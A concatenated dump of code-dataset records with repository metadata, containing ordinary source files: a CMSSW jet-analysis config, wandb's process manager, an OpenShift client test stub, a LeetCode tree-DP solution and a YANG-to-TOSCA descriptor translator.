class_data_root="%s_lin_std" % root,
zvals=ZVALS, default_params={'mnu': 0.}, mode='std')
generate_ccl_pspec(sample_points, ccl_root,
class_data_root="%s_lin_pre" % root,
zvals=ZVALS, default_params={'mnu': 0.}, mode='pre')
generate_ccl_pspec(sample_points, ccl_root,
class_data_root="%s_nl_std" % root,
zvals=ZVALS, default_params={'mnu': 0.},
nonlin=True, mode='std')
generate_ccl_pspec(sample_points, ccl_root,
class_data_root="%s_nl_pre" % root,
zvals=ZVALS, default_params={'mnu': 0.},
nonlin=True, mode='pre')
| [
"[email protected]"
] | |
4db596e6c7138de5c3da2c08096ca5ff74647e04 | 0bc777a57e39c466a9482af9a6eda698ab3c1437 | /HeavyIonsAnalysis/JetAnalysis/python/jets/akPu3PFJetSequence_PbPb_data_cff.py | 51ef615578166024b0ea28233b748df5a4cde187 | [] | no_license | stahlleiton/cmssw | 3c78d80b9372fdf2a37f424372504b23c9dc4f78 | fcfda663dc8c315b505eb6bcc7e936401c01c4d1 | refs/heads/EWQAnalysis2017_8030 | 2023-08-23T13:50:40.837198 | 2017-11-09T17:45:31 | 2017-11-09T17:45:31 | 45,795,305 | 0 | 3 | null | 2021-04-30T07:36:28 | 2015-11-08T19:28:54 | C++ | UTF-8 | Python | false | false | 14,698 | py |
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
akPu3PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("akPu3PFJets"),
matched = cms.InputTag("ak3HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.3
)
akPu3PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("ak3HiSignalGenJets"),
matched = cms.InputTag("ak3HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.3
)
akPu3PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPu3PFJets")
)
akPu3PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akPu3PFJets"),
payload = "AKPu3PF_offline"
)
akPu3PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akPu3CaloJets'))
#akPu3PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak3HiSignalGenJets'))
akPu3PFbTagger = bTaggers("akPu3PF",0.3)
#create objects locally since they dont load properly otherwise
#akPu3PFmatch = akPu3PFbTagger.match
akPu3PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPu3PFJets"), matched = cms.InputTag("hiSignalGenParticles"))
akPu3PFPatJetFlavourAssociationLegacy = akPu3PFbTagger.PatJetFlavourAssociationLegacy
akPu3PFPatJetPartons = akPu3PFbTagger.PatJetPartons
akPu3PFJetTracksAssociatorAtVertex = akPu3PFbTagger.JetTracksAssociatorAtVertex
akPu3PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akPu3PFSimpleSecondaryVertexHighEffBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPu3PFSimpleSecondaryVertexHighPurBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPu3PFCombinedSecondaryVertexBJetTags = akPu3PFbTagger.CombinedSecondaryVertexBJetTags
akPu3PFCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.CombinedSecondaryVertexV2BJetTags
akPu3PFJetBProbabilityBJetTags = akPu3PFbTagger.JetBProbabilityBJetTags
akPu3PFSoftPFMuonByPtBJetTags = akPu3PFbTagger.SoftPFMuonByPtBJetTags
akPu3PFSoftPFMuonByIP3dBJetTags = akPu3PFbTagger.SoftPFMuonByIP3dBJetTags
akPu3PFTrackCountingHighEffBJetTags = akPu3PFbTagger.TrackCountingHighEffBJetTags
akPu3PFTrackCountingHighPurBJetTags = akPu3PFbTagger.TrackCountingHighPurBJetTags
akPu3PFPatJetPartonAssociationLegacy = akPu3PFbTagger.PatJetPartonAssociationLegacy
akPu3PFImpactParameterTagInfos = akPu3PFbTagger.ImpactParameterTagInfos
akPu3PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPu3PFJetProbabilityBJetTags = akPu3PFbTagger.JetProbabilityBJetTags
akPu3PFSecondaryVertexTagInfos = akPu3PFbTagger.SecondaryVertexTagInfos
akPu3PFSimpleSecondaryVertexHighEffBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPu3PFSimpleSecondaryVertexHighPurBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPu3PFCombinedSecondaryVertexBJetTags = akPu3PFbTagger.CombinedSecondaryVertexBJetTags
akPu3PFCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.CombinedSecondaryVertexV2BJetTags
akPu3PFSecondaryVertexNegativeTagInfos = akPu3PFbTagger.SecondaryVertexNegativeTagInfos
akPu3PFNegativeSimpleSecondaryVertexHighEffBJetTags = akPu3PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akPu3PFNegativeSimpleSecondaryVertexHighPurBJetTags = akPu3PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akPu3PFNegativeCombinedSecondaryVertexBJetTags = akPu3PFbTagger.NegativeCombinedSecondaryVertexBJetTags
akPu3PFPositiveCombinedSecondaryVertexBJetTags = akPu3PFbTagger.PositiveCombinedSecondaryVertexBJetTags
akPu3PFNegativeCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
akPu3PFPositiveCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
akPu3PFSoftPFMuonsTagInfos = akPu3PFbTagger.SoftPFMuonsTagInfos
akPu3PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPu3PFSoftPFMuonBJetTags = akPu3PFbTagger.SoftPFMuonBJetTags
akPu3PFSoftPFMuonByIP3dBJetTags = akPu3PFbTagger.SoftPFMuonByIP3dBJetTags
akPu3PFSoftPFMuonByPtBJetTags = akPu3PFbTagger.SoftPFMuonByPtBJetTags
akPu3PFNegativeSoftPFMuonByPtBJetTags = akPu3PFbTagger.NegativeSoftPFMuonByPtBJetTags
akPu3PFPositiveSoftPFMuonByPtBJetTags = akPu3PFbTagger.PositiveSoftPFMuonByPtBJetTags
akPu3PFPatJetFlavourIdLegacy = cms.Sequence(akPu3PFPatJetPartonAssociationLegacy*akPu3PFPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akPu3PFPatJetFlavourAssociation = akPu3PFbTagger.PatJetFlavourAssociation
#akPu3PFPatJetFlavourId = cms.Sequence(akPu3PFPatJetPartons*akPu3PFPatJetFlavourAssociation)
akPu3PFJetBtaggingIP = cms.Sequence(akPu3PFImpactParameterTagInfos *
(akPu3PFTrackCountingHighEffBJetTags +
akPu3PFTrackCountingHighPurBJetTags +
akPu3PFJetProbabilityBJetTags +
akPu3PFJetBProbabilityBJetTags
)
)
akPu3PFJetBtaggingSV = cms.Sequence(akPu3PFImpactParameterTagInfos
*
akPu3PFSecondaryVertexTagInfos
* (akPu3PFSimpleSecondaryVertexHighEffBJetTags+
akPu3PFSimpleSecondaryVertexHighPurBJetTags+
akPu3PFCombinedSecondaryVertexBJetTags+
akPu3PFCombinedSecondaryVertexV2BJetTags
)
)
akPu3PFJetBtaggingNegSV = cms.Sequence(akPu3PFImpactParameterTagInfos
*
akPu3PFSecondaryVertexNegativeTagInfos
* (akPu3PFNegativeSimpleSecondaryVertexHighEffBJetTags+
akPu3PFNegativeSimpleSecondaryVertexHighPurBJetTags+
akPu3PFNegativeCombinedSecondaryVertexBJetTags+
akPu3PFPositiveCombinedSecondaryVertexBJetTags+
akPu3PFNegativeCombinedSecondaryVertexV2BJetTags+
akPu3PFPositiveCombinedSecondaryVertexV2BJetTags
)
)
akPu3PFJetBtaggingMu = cms.Sequence(akPu3PFSoftPFMuonsTagInfos * (akPu3PFSoftPFMuonBJetTags
+
akPu3PFSoftPFMuonByIP3dBJetTags
+
akPu3PFSoftPFMuonByPtBJetTags
+
akPu3PFNegativeSoftPFMuonByPtBJetTags
+
akPu3PFPositiveSoftPFMuonByPtBJetTags
)
)
akPu3PFJetBtagging = cms.Sequence(akPu3PFJetBtaggingIP
*akPu3PFJetBtaggingSV
*akPu3PFJetBtaggingNegSV
# *akPu3PFJetBtaggingMu
)
akPu3PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akPu3PFJets"),
genJetMatch = cms.InputTag("akPu3PFmatch"),
genPartonMatch = cms.InputTag("akPu3PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPu3PFcorr")),
JetPartonMapSource = cms.InputTag("akPu3PFPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akPu3PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akPu3PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akPu3PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akPu3PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akPu3PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("akPu3PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akPu3PFJetBProbabilityBJetTags"),
cms.InputTag("akPu3PFJetProbabilityBJetTags"),
#cms.InputTag("akPu3PFSoftPFMuonByPtBJetTags"),
#cms.InputTag("akPu3PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akPu3PFTrackCountingHighEffBJetTags"),
cms.InputTag("akPu3PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akPu3PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = False,
addGenJetMatch = False,
embedGenJetMatch = False,
embedGenPartonMatch = False,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akPu3PFNjettiness = Njettiness.clone(
src = cms.InputTag("akPu3PFJets"),
R0 = cms.double( 0.3)
)
akPu3PFpatJetsWithBtagging.userData.userFloats.src += ['akPu3PFNjettiness:tau1','akPu3PFNjettiness:tau2','akPu3PFNjettiness:tau3']
akPu3PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akPu3PFpatJetsWithBtagging"),
genjetTag = 'ak3HiSignalGenJets',
rParam = 0.3,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = False,
isMC = False,
doSubEvent = False,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akPu3PF"),
jetName = cms.untracked.string("akPu3PF"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(False),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("ak3GenJets"),
doGenTaus = cms.untracked.bool(False),
genTau1 = cms.InputTag("ak3GenNjettiness","tau1"),
genTau2 = cms.InputTag("ak3GenNjettiness","tau2"),
genTau3 = cms.InputTag("ak3GenNjettiness","tau3"),
doGenSym = cms.untracked.bool(False),
genSym = cms.InputTag("ak3GenJets","sym"),
genDroppedBranches = cms.InputTag("ak3GenJets","droppedBranches")
)
akPu3PFJetSequence_mc = cms.Sequence(
#akPu3PFclean
#*
akPu3PFmatch
#*
#akPu3PFmatchGroomed
*
akPu3PFparton
*
akPu3PFcorr
*
#akPu3PFJetID
#*
akPu3PFPatJetFlavourIdLegacy
#*
#akPu3PFPatJetFlavourId # Use legacy algo till PU implemented
*
akPu3PFJetTracksAssociatorAtVertex
*
akPu3PFJetBtagging
*
akPu3PFNjettiness #No constituents for calo jets in pp. Must be removed for pp calo jets but I'm not sure how to do this transparently (Marta)
*
akPu3PFpatJetsWithBtagging
*
akPu3PFJetAnalyzer
)
akPu3PFJetSequence_data = cms.Sequence(akPu3PFcorr
*
#akPu3PFJetID
#*
akPu3PFJetTracksAssociatorAtVertex
*
akPu3PFJetBtagging
*
akPu3PFNjettiness
*
akPu3PFpatJetsWithBtagging
*
akPu3PFJetAnalyzer
)
akPu3PFJetSequence_jec = cms.Sequence(akPu3PFJetSequence_mc)
akPu3PFJetSequence_mb = cms.Sequence(akPu3PFJetSequence_mc)
akPu3PFJetSequence = cms.Sequence(akPu3PFJetSequence_data)
| [
"[email protected]"
] | |
1416874157729825714165b2eecc1af24e692c63 | d3196fb38078fdbe966bd5af8a8a4f2924a47c20 | /wandb/sdk/wandb_manager.py | 69e8c503a571a70e1c710938889cb33c97a665cf | [
"MIT"
] | permissive | morganmcg1/client | a1ae01ea302f13a6c9850972411ecabcb900dbc6 | 099f7aa938fb62c5a5d3e12f7d2067196498b67c | refs/heads/master | 2023-09-06T01:14:40.282234 | 2021-11-13T03:01:01 | 2021-11-13T03:01:01 | 427,620,124 | 0 | 0 | MIT | 2021-11-13T09:22:12 | 2021-11-13T09:22:11 | null | UTF-8 | Python | false | false | 3,831 | py | """Manage wandb processes.
Create a grpc manager channel.
"""
import atexit
import multiprocessing
import os
from typing import Callable, Optional, Tuple, TYPE_CHECKING
from wandb import env
from wandb.sdk.lib.exit_hooks import ExitHooks
if TYPE_CHECKING:
from wandb.sdk.service import service
from wandb.sdk.wandb_settings import Settings
class _ManagerToken:
_token_str: Optional[str]
def __init__(self) -> None:
self._token_str = None
def probe(self) -> None:
token = os.environ.get(env.SERVICE)
if not token:
return
self._token_str = token
def configure(self, port: int) -> None:
version = "1"
pid = os.getpid()
token = "-".join([version, str(pid), str(port)])
os.environ[env.SERVICE] = token
self._token_str = token
def parse(self) -> Tuple[str, int, int]:
assert self._token_str
parts = self._token_str.split("-")
assert len(parts) == 3, f"token must have 3 parts: {parts}"
# TODO: make more robust?
version, pid_str, port_str = parts
pid_int = int(pid_str)
port_int = int(port_str)
return version, pid_int, port_int
@property
def token(self) -> Optional[str]:
return self._token_str
@property
def port(self) -> int:
_, _, port = self.parse()
return port
class _Manager:
_token: _ManagerToken
_atexit_lambda: Optional[Callable[[], None]]
_hooks: Optional[ExitHooks]
def __init__(self) -> None:
# TODO: warn if user doesnt have grpc installed
from wandb.sdk.service import service
self._atexit_lambda = None
self._hooks = None
self._token = _ManagerToken()
self._service = service._Service()
self._setup_mp()
self._setup()
def _setup_mp(self) -> None:
# NOTE: manager does not support fork yet, support coming later
start_method = multiprocessing.get_start_method(allow_none=True)
assert start_method != "fork", "start method 'fork' is not supported yet"
if start_method is None:
multiprocessing.set_start_method("spawn")
def _setup(self) -> None:
self._token.probe()
if not self._token.token:
self._setup_service()
port = self._token.port
self._service.connect(port=port)
def _setup_service(self) -> None:
port = self._service.start()
assert port
self._token.configure(port=port)
self._atexit_setup()
def _atexit_setup(self) -> None:
self._atexit_lambda = lambda: self._atexit_teardown()
self._hooks = ExitHooks()
self._hooks.hook()
atexit.register(self._atexit_lambda)
def _atexit_teardown(self) -> None:
exit_code = self._hooks.exit_code if self._hooks else 0
self._teardown(exit_code)
def _teardown(self, exit_code: int) -> None:
if self._atexit_lambda:
atexit.unregister(self._atexit_lambda)
self._atexit_lambda = None
self._inform_teardown(exit_code)
def _get_service(self) -> "service._Service":
return self._service
def _inform_init(self, settings: "Settings", run_id: str) -> None:
svc = self._service
assert svc
svc._svc_inform_init(settings=settings, run_id=run_id)
def _inform_attach(self, attach_id: str) -> None:
svc = self._service
assert svc
svc._svc_inform_attach(attach_id=attach_id)
def _inform_finish(self, run_id: str = None) -> None:
svc = self._service
assert svc
svc._svc_inform_finish(run_id=run_id)
def _inform_teardown(self, exit_code: int) -> None:
svc = self._service
assert svc
svc._svc_inform_teardown(exit_code)
| [
"[email protected]"
] | |
a778f90e545e61c423df01e02861dbf5ed9a4647 | 02467e9975b50c14b4dc8cdc6dc03748f9aa8245 | /openshift/test/test_v1_scale_status.py | 2fa26692bfeeef412de792161c348de67a929f4f | [
"Apache-2.0"
] | permissive | ashcrow/python-openshift | 3995e3c4b72bf52a62bc6b07dabf3d0f709444ae | 74c9ade612def941938016385842631342e926de | refs/heads/master | 2021-01-11T19:29:04.419005 | 2017-01-18T19:31:58 | 2017-01-18T19:31:58 | 79,377,387 | 0 | 0 | null | 2017-01-18T19:46:04 | 2017-01-18T19:46:04 | null | UTF-8 | Python | false | false | 4,142 | py | # coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use openshift.client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a openshift.client. By listing and beginning a watch from the returned resourceVersion, openshift.clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so openshift.clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'unversioned.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but openshift.clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
OpenAPI spec version: v1.5.0-alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import openshift.client
from openshift.client.rest import ApiException
from openshift.client.models.v1_scale_status import V1ScaleStatus
class TestV1ScaleStatus(unittest.TestCase):
""" V1ScaleStatus unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ScaleStatus(self):
"""
Test V1ScaleStatus
"""
model = openshift.client.models.v1_scale_status.V1ScaleStatus()
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
bfd99c37854c269ae7937012f17c63e5e0f061cd | 223590e81400eb8192aeb0a56b36b5a80408d4b4 | /House Robber III.py | 584a90ed9a8be182d31caf96c6718832136be16d | [] | no_license | TianyaoHua/LeetCodeSolutions | c47fd3b6ae0bf60c0656ce12fb88290672c129ed | 418172cee1bf48bb2aed3b84fe8b4defd9ef4fdf | refs/heads/master | 2020-03-06T19:48:13.338630 | 2018-08-10T18:27:52 | 2018-08-10T18:27:52 | 127,037,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def value(self, node, dict):
if not node:
return 0
elif node in dict:
return dict[node]
else:
money1 = self.value(node.lert, dict) + self.value(node.right ,dict)
money2 = node.val
if node.left:
money2 += (self.value(node.left.left, dict) + self.value(node.left.right, dict))
if node.right:
money2 += (self.value(node.right.left, dict) + self.value(node.right.right, dict))
money = max(money1, money2)
dict.update({node: money})
return money
def rob(self, root):
"""
:type root: TreeNode
:rtype: int
"""
return self.value(root, {}) | [
"[email protected]"
] | |
1226dd2c5a9a51b542246bedd7bd3c1873fdbad6 | 20f951bd927e4e5cde8ef7781813fcf0d51cc3ea | /fossir/modules/auth/models/registration_requests.py | 2b82b271bd15c697c17e87bacc2dcbf1d924edf3 | [] | no_license | HodardCodeclub/SoftwareDevelopment | 60a0fbab045cb1802925d4dd5012d5b030c272e0 | 6300f2fae830c0c2c73fe0afd9c684383bce63e5 | refs/heads/master | 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,160 | py |
from __future__ import unicode_literals
from sqlalchemy.dialects.postgresql import ARRAY, JSON
from werkzeug.datastructures import MultiDict
from fossir.core.db import db
from fossir.util.locators import locator_property
from fossir.util.string import format_repr, return_ascii
class RegistrationRequest(db.Model):
__tablename__ = 'registration_requests'
__table_args__ = (
db.CheckConstraint('email = lower(email)', 'lowercase_email'),
{'schema': 'users'}
)
id = db.Column(
db.Integer,
primary_key=True
)
comment = db.Column(
db.Text,
nullable=False,
default=''
)
email = db.Column(
db.String,
unique=True,
nullable=False,
index=True
)
extra_emails = db.Column(
ARRAY(db.String),
nullable=False,
default=[]
)
user_data = db.Column(
JSON,
nullable=False
)
_identity_data = db.Column(
'identity_data',
JSON,
nullable=False
)
settings = db.Column(
JSON,
nullable=False
)
@locator_property
def locator(self):
return {'request_id': self.id}
@property
def identity_data(self):
identity_data = self._identity_data.copy()
# if we have data in identity_data, it was converted from a
# MultiDict so we need to convert it back.
if 'data' in identity_data:
tmp = MultiDict()
tmp.update(self._identity_data['data'])
identity_data['data'] = tmp
return identity_data
@identity_data.setter
def identity_data(self, identity_data):
identity_data = identity_data.copy()
# `identity_data['data']` for multipass-based identities is a
# MultiDict, but json-encoding it would lose all extra values
# for a key, so we convert it to a dict of lists first
if 'data' in identity_data:
identity_data['data'] = dict(identity_data['data'].lists())
self._identity_data = identity_data
@return_ascii
def __repr__(self):
return format_repr(self, 'id', 'email')
| [
"[email protected]"
] | |
7b571d83f84608ebeeaddbfae06938549a457d9b | 54d17336ca03801bd9c9ef37be8642b332ab71c4 | /osm/SO/common/python/rift/mano/yang_translator/rwmano/translate_descriptors.py | 2023db5a8ce00b6b1b6982b49c0b0047939c92fb | [] | no_license | dennis-me/Pishahang | 2428379c4f7d3ee85df4b85727ce92e8fe69957a | cdd0abe80a76d533d08a51c7970d8ded06624b7d | refs/heads/master | 2020-09-07T12:35:54.734782 | 2020-01-24T20:11:33 | 2020-01-24T20:11:33 | 220,782,212 | 2 | 0 | null | 2019-11-10T11:46:44 | 2019-11-10T11:46:43 | null | UTF-8 | Python | false | false | 8,136 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Copyright 2016 RIFT.io Inc
import importlib
import os
from rift.mano.yang_translator.common.exception import YangClassAttributeError
from rift.mano.yang_translator.common.exception import YangClassImportError
from rift.mano.yang_translator.common.exception import YangModImportError
from rift.mano.yang_translator.common.utils import _
from rift.mano.yang_translator.conf.config import ConfigProvider \
as translatorConfig
from rift.mano.yang_translator.rwmano.syntax.tosca_resource \
import ToscaResource
class TranslateDescriptors(object):
'''Translate YANG NodeTemplates to RIFT.io MANO Resources.'''
YANG_DESC = (NSD, VNFD) = ('nsd', 'vnfd')
###########################
# Module utility Functions
# for dynamic class loading
###########################
YANG_TO_TOSCA_TYPE = None
def _load_classes(log, locations, classes):
'''Dynamically load all the classes from the given locations.'''
for cls_path in locations:
# Use the absolute path of the class path
abs_path = os.path.dirname(os.path.abspath(__file__))
abs_path = abs_path.replace('rift/mano/yang_translator/rwmano',
cls_path)
log.debug(_("Loading classes from %s") % abs_path)
# Grab all the yang type module files in the given path
mod_files = [f for f in os.listdir(abs_path) if (
f.endswith('.py') and
not f.startswith('__init__') and
f.startswith('yang_'))]
# For each module, pick out the target translation class
for f in mod_files:
f_name, ext = f.rsplit('.', 1)
mod_name = cls_path + '/' + f_name
mod_name = mod_name.replace('/', '.')
try:
mod = importlib.import_module(mod_name)
target_name = getattr(mod, 'TARGET_CLASS_NAME')
clazz = getattr(mod, target_name)
classes.append(clazz)
except ImportError:
raise YangModImportError(mod_name=mod_name)
except AttributeError:
if target_name:
raise YangClassImportError(name=target_name,
mod_name=mod_name)
else:
# TARGET_CLASS_NAME is not defined in module.
# Re-raise the exception
raise
def _generate_type_map(log):
'''Generate YANG translation types map.
Load user defined classes from location path specified in conf file.
Base classes are located within the yang directory.
'''
# Base types directory
BASE_PATH = 'rift/mano/yang_translator/rwmano/yang'
# Custom types directory defined in conf file
custom_path = translatorConfig.get_value('DEFAULT',
'custom_types_location')
# First need to load the parent module, for example 'contrib.mano',
# for all of the dynamically loaded classes.
classes = []
TranslateDescriptors._load_classes(log,
(BASE_PATH, custom_path),
classes)
try:
types_map = {clazz.yangtype: clazz for clazz in classes}
log.debug(_("Type maps loaded: {}").format(types_map.keys()))
except AttributeError as e:
raise YangClassAttributeError(message=e.message)
return types_map
def __init__(self, log, yangs, tosca_template, vnfd_files=None):
self.log = log
self.yangs = yangs
self.tosca_template = tosca_template
self.vnfd_files = vnfd_files
# list of all TOSCA resources generated
self.tosca_resources = []
self.metadata = {}
log.debug(_('Mapping between YANG nodetemplate and TOSCA resource.'))
def translate(self):
if TranslateDescriptors.YANG_TO_TOSCA_TYPE is None:
TranslateDescriptors.YANG_TO_TOSCA_TYPE = \
TranslateDescriptors._generate_type_map(self.log)
return self._translate_yang()
def translate_metadata(self):
"""Translate and store the metadata in instance"""
FIELDS_MAP = {
'ID': 'name',
'vendor': 'vendor',
'version': 'version',
}
metadata = {}
# Initialize to default values
metadata['name'] = 'yang_to_tosca'
metadata['vendor'] = 'RIFT.io'
metadata['version'] = '1.0'
if 'nsd' in self.yangs:
yang_meta = self.yang['nsd'][0]
elif 'vnfd' in self.yangs:
yang_meta = self.yang['vnfd'][0]
for key in FIELDS_MAP:
if key in yang_meta.keys():
metadata[key] = str(yang_meta[FIELDS_MAP[key]])
self.log.debug(_("Metadata {0}").format(metadata))
self.metadata = metadata
def _translate_yang(self):
self.log.debug(_('Translating the descriptors.'))
if self.NSD in self.yangs:
for nsd in self.yangs[self.NSD]:
self.log.debug(_("Translate descriptor of type nsd: {}").
format(nsd))
node_name = nsd.pop(ToscaResource.NAME).replace(' ','_')
node_name = node_name if node_name.endswith('nsd') else ''.join([node_name, '_nsd'])
tosca_node = TranslateDescriptors. \
YANG_TO_TOSCA_TYPE[self.NSD](
self.log,
node_name,
self.NSD,
nsd,
self.vnfd_files)
self.tosca_resources.append(tosca_node)
vnfd_name_list = []
if self.VNFD in self.yangs:
for vnfd in self.yangs[self.VNFD]:
if vnfd['name'] not in vnfd_name_list:
self.log.debug(_("Translate descriptor of type vnfd: {}").
format(vnfd))
vnfd_name_list.append(vnfd['name'])
tosca_node = TranslateDescriptors. \
YANG_TO_TOSCA_TYPE[self.VNFD](
self.log,
vnfd.pop(ToscaResource.NAME),
self.VNFD,
vnfd)
self.tosca_resources.append(tosca_node)
# First translate VNFDs
for node in self.tosca_resources:
if node.type == self.VNFD:
self.log.debug(_("Handle yang for {0} of type {1}").
format(node.name, node.type_))
node.handle_yang()
# Now translate NSDs
for node in self.tosca_resources:
if node.type == self.NSD:
self.log.debug(_("Handle yang for {0} of type {1}").
format(node.name, node.type_))
node.handle_yang(self.tosca_resources)
return self.tosca_resources
def find_tosca_resource(self, name):
for resource in self.tosca_resources:
if resource.name == name:
return resource
def _find_yang_node(self, yang_name):
for node in self.nodetemplates:
if node.name == yang_name:
return node
| [
"[email protected]"
] | |
7c56516f441b0a72ae06e9f44126a1862c11d9ef | 8bd63bc56b39d26458ad54b7f18c4b149c1e3ce2 | /sphinx-files/rst-files/Data/code/2017/07/000715/jgpwjtuaoawbmpf.py | 871c670e4634997240d6eaa9ce8ab46848bc20d0 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain-disclaimer",
"LicenseRef-scancode-public-domain"
